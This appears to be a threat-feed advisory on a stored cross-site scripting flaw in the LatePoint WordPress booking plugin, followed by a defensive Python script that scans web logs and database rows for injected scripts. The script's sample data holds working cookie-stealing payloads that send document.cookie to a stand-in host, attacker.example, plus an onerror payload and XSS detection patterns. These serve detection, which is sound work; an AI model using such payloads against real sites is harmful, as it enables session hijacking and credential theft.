{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/cve-2026-7332/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-7332"}],"_cs_exploited":false,"_cs_products":["LatePoint – Calendar Booking Plugin for Appointments and Events plugin \u003c= 5.5.0"],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","stored-xss","cve-2026-7332","plugin"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to stored cross-site scripting (XSS), tracked as CVE-2026-7332, in all versions up to and including 5.5.0. Unauthenticated attackers can inject arbitrary web scripts through the \u003ccode\u003ebooking_form_page_url\u003c/code\u003e parameter, which the plugin stores and later renders without adequate input sanitization or output escaping. Stripe does not need to be configured for the flaw to be reachable. The injected JavaScript runs in the browser of any user who loads a page on which the stored value is rendered, which can lead to account compromise, data theft, or other malicious activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker crafts a request in which the \u003ccode\u003ebooking_form_page_url\u003c/code\u003e parameter carries a JavaScript payload instead of a legitimate page URL.\u003c/li\u003e\n\u003cli\u003eThe attacker sends the request to a WordPress site running a vulnerable LatePoint release (5.5.0 or earlier).\u003c/li\u003e\n\u003cli\u003eThe plugin neither sanitizes the value on input nor escapes it on output.\u003c/li\u003e\n\u003cli\u003eThe payload is persisted in the WordPress database as part of the plugin\u0026rsquo;s stored data (its settings or booking records).\u003c/li\u003e\n\u003cli\u003eA legitimate user loads a page on which LatePoint renders the stored value.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the attacker-injected JavaScript in the context of the site\u0026rsquo;s origin.\u003c/li\u003e\n\u003cli\u003eThe script can steal cookies or other session material, redirect the user to a phishing site, or modify page content.\u003c/li\u003e\n\u003cli\u003eThe attacker takes over the user\u0026rsquo;s session or uses it to inject further malicious content into the site.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation lets an unauthenticated attacker run arbitrary JavaScript in the browser of every user who views the affected page. Depending on who that user is, the impact ranges from session hijacking and website defacement to redirection to malicious sites and theft of sensitive information such as user credentials and financial data. The number of affected installations is not known, but every site running LatePoint 5.5.0 or earlier is exposed, and no account on the site is needed to plant the payload.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the LatePoint – Calendar Booking Plugin for Appointments and Events to a release later than 5.5.0, which patches CVE-2026-7332.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect LatePoint XSS Attempt via booking_form_page_url\u003c/code\u003e against web server logs to flag requests that place script-like content in the \u003ccode\u003ebooking_form_page_url\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eReview the LatePoint data already in the WordPress database for injected scripts and remove any that are found: upgrading stops new injections but does not clean out payloads stored before the patch was applied.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-latepoint-xss/","summary":"The LatePoint WordPress plugin, in versions up to and including 5.5.0, is vulnerable to stored XSS via the booking_form_page_url parameter, allowing unauthenticated attackers to inject arbitrary web scripts that execute in the browser of any user who views the affected page.","title":"LatePoint WordPress Plugin Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-latepoint-xss/"}],"language":"en","title":"CraftedSignal Threat Feed — CVE-2026-7332","version":"https://jsonfeed.org/version/1.1"}
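The brief's two detection recommendations, monitoring web server logs for script-like content in `booking_form_page_url` and reviewing data the plugin has already stored, both reduce to the same check: decode the value fully and look for XSS indicators. The helper below is an added example, not code from CraftedSignal or from the LatePoint plugin. The access-log format (Apache/nginx "combined"), the `(identifier, value)` row layout, and the indicator patterns are assumptions; the log lines and rows are constructed for the example, and the third log line is double URL-encoded to show why decoding is repeated until it stops changing.

```python
"""Review helper for the two detection steps in the brief above.

Added example, not code from CraftedSignal or from the LatePoint plugin.
It (1) scans web server access-log lines for requests whose
booking_form_page_url parameter carries script-like content, the check the
named Sigma rule performs, and (2) scans rows exported from the WordPress
database for payloads that are already stored. The log format, row layout
and indicator patterns are assumptions; the sample data is constructed.
"""
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

PARAM = "booking_form_page_url"

# Indicators of an injection attempt, matched against the fully decoded value.
# This is a heuristic: it will flag some odd-but-benign URLs (e.g. one
# containing "online=1"), so treat a hit as something to review, not as proof.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"<\s*(svg|img|iframe|object|embed|body|details|math)\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),   # inline event handlers: onerror=, onload=, ...
    re.compile(r"javascript\s*:", re.I),    # javascript: URLs
]


def decode(value: str) -> str:
    """Strip the layers an attacker may add to dodge naive matching:
    repeated URL-encoding, then HTML entities (&lt;script&gt; ...)."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return html.unescape(value)


def is_suspicious(value: str) -> bool:
    decoded = decode(value)
    return any(p.search(decoded) for p in XSS_PATTERNS)


# "combined" access-log format (assumed); only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return (client ip, timestamp, decoded payload) for every request whose
    booking_form_page_url query parameter looks like an XSS attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        # parse_qs removes one layer of URL-encoding; decode() handles the rest.
        for raw in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            if is_suspicious(raw):
                hits.append((m["ip"], m["ts"], decode(raw)))
    return hits


def scan_stored_values(rows):
    """rows: (identifier, value) pairs exported from the plugin's tables or
    wp_options (layout assumed). Returns the pairs whose value already holds
    a payload, so the identifier tells you which row to clean up."""
    return [(ident, value) for ident, value in rows if is_suspicious(value)]


# Constructed sample data (not real traffic). Line 3 is double URL-encoded.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jan/2024:12:00:01 +0000] "GET /book/?booking_form_page_url=https%3A%2F%2Fexample.com%2Fbook%2F HTTP/1.1" 200 512',
    '203.0.113.9 - - [03/Jan/2024:12:00:02 +0000] "GET /book/?booking_form_page_url=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 512',
    '198.51.100.4 - - [03/Jan/2024:12:00:03 +0000] "GET /book/?booking_form_page_url=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 512',
]

SAMPLE_ROWS = [
    ("option_1", "https://example.com/book/"),
    ("option_2", "\"><svg onload=fetch('https://attacker.example/?c='+document.cookie)>"),
]

if __name__ == "__main__":
    for ip, ts, payload in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} {PARAM}={payload!r}")
    for ident, value in scan_stored_values(SAMPLE_ROWS):
        print(f"stored payload in {ident}: {value!r}")
```

Two caveats when running this against a real site: an access log only records the query string, so if the vulnerable endpoint accepts `booking_form_page_url` in a POST body the attempt will not appear there and you need request-body logging (a WAF or ModSecurity audit log) instead; and a regex heuristic is a triage aid, not a control, so the database review and the upgrade to a release later than 5.5.0 remain the actual fix.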